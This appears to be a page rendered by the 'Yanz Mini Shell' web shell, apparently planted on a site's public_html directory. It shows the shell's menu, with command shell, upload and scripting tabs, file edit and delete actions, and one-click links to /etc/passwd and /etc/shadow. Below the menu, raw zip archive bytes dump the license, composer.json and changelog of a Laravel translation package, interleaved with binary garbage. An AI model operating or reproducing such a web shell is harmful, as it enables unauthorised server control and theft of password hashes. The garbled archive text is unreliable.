Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
admin
web
uyoxpress.com
public_html
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
PK ! E ��: : localizator/LICENSE.mdnu �[��� # License The MIT License (MIT) Copyright (c) Amir Rami Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. PK ! �|x�� � localizator/composer.jsonnu �[��� { "name": "amirami/localizator", "description": "Localizator is a small tool for Laravel that gives you the ability to extract untranslated strings from project files. It works using the artisan command line and the provided localize command.", "homepage": "https://github.com/amiranagram/localizator", "license": "MIT", "authors": [ { "name": "Amir Rami", "email": "me@amirrami.com", "homepage": "https://amirrami.com", "role": "Developer" } ], "require": { "php": "^7.2.5|^8.0", "ext-json": "*", "illuminate/config": "^6.0|^8.0|^9.0|^10.0", "illuminate/console": "^6.0|^8.0|^9.0|^10.0", "illuminate/support": "^6.0|^8.0|^9.0|^10.0", "illuminate/filesystem": "^6.0|^8.0|^9.0|^10.0", "symfony/finder": "^4.4|^5.1|^6.0" }, "require-dev": { "mockery/mockery": "^1.3.3", "orchestra/testbench": "^4.0|^6.6|^7.0|^8.0", "phpunit/phpunit": "^8.5|^9.5" }, "autoload": { "psr-4": { "Amirami\\Localizator\\": "src" }, "files": [ "src/helpers.php" ] }, "autoload-dev": { "psr-4": { "Amirami\\Localizator\\Tests\\": "tests" } }, "scripts": { "test": "vendor/bin/phpunit --colors=always", "test-coverage": "vendor/bin/phpunit --coverage-html coverage", "act": "act -P ubuntu-latest=shivammathur/node:latest -j" }, "config": { "sort-packages": true }, "extra": { "laravel": { "providers": [ "Amirami\\Localizator\\ServiceProvider" ] } }, "minimum-stability": "dev", "prefer-stable": true } PK ! Duɨ6 6 localizator/CHANGELOG.mdnu �[��� # Changelog All notable changes to `amirami/localizator` will be documented in this file. ## 0.12.0 - 2023-04-14 ### What's Changed - Add Laravel 10 compatibility by @musmanikram in https://github.com/amiranagram/localizator/pull/55 ## 0.11.1 - 2023-01-16 ### Fixed - `lang_path` for Laravel 9 by @amiranagram in https://github.com/amiranagram/localizator/pull/49 ## 0.11.0 - 2022-11-14 ### Changed - Exclude subdirectories by @amiranagram in https://github.com/amiranagram/localizator/pull/45 ## 0.10.1 - 2022-10-19 ### Added - Added an option to remove missing keys by @filip-nifti in https://github.com/amiranagram/localizator/pull/42 ## 0.9.1 - 2022-04-11 ## Changed - Keep numbered keys as strings in PHP lang files by @amiranagram in https://github.com/amiranagram/localizator/pull/37 ## 0.9.0 - 2022-03-12 ## Changed - Add support for newlines and spaces by @rexlManu in https://github.com/amiranagram/localizator/pull/35 ## 0.8.1 - 2022-02-23 ## Changed - New lang path for Laravel 9.x by @amiranagram in https://github.com/amiranagram/localizator/pull/33 ## 0.8.0 - 2022-02-15 ## Added - Added support for Laravel 9 by @musmanikram in https://github.com/amiranagram/localizator/pull/32 ## v0.7.1-alpha ### Added - Confirm usage of localize command in production. ### Changed - Use `testbench:^4.0` for Laravel 6.* LTS. ## v0.7.0-alpha ### Changed - Update dependencies, PHP 7.2.5 is now the minimum version. ## v0.6.1-alpha ### Fixed - Remove space after php opening tag for default locale export. ## v0.6.0-alpha ### Added - Added PHP 8 Support. ## v0.5.1-alpha ### Fixed - Strip slashes from translation keys. ## v0.5.0-alpha ### Fixed - Update PHP CS Fixer. - Natural case-insensitive sort. - Use `assertSame` instead of `assertEquals` in tests to compare arrays. ## v0.4.0-alpha ### Added - Default export to php lang files. ## v0.3.0-alpha ### Added - Laravel 6 LTS support. ## v0.2.0-alpha ### Added - Basic tests. ### Changed - Small improvements using paths. - Documentation. - Dependencies. ## v0.1.0-alpha - Initial release. PK ! "J^<� � "